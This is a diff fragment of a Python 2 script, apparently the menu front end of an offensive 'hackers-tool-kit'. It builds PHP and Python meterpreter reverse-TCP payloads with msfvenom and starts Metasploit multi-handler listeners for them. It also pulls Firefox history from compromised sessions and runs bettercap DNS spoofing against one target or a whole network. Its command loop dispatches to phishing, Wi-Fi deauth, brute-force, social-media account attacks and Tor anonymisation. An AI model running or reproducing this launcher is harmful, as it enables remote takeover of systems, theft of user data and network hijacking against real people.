+#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#DNS SPOOF START# +#---------------# +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + + +#-------------# +#DNS SPOOF END# + + +#REBOOT HTK START# +#----------# +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() +#--------------# +#REBOOT HTK END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + try: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoofall": + dnsspoofall() + if x == "htk-lite": + os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") + if x == "reboot": + reboot() + if x == "specscan": + specscan() + if x == "anon on": + anonon() + if x == "anon off": + anonoff() + + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True + +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT#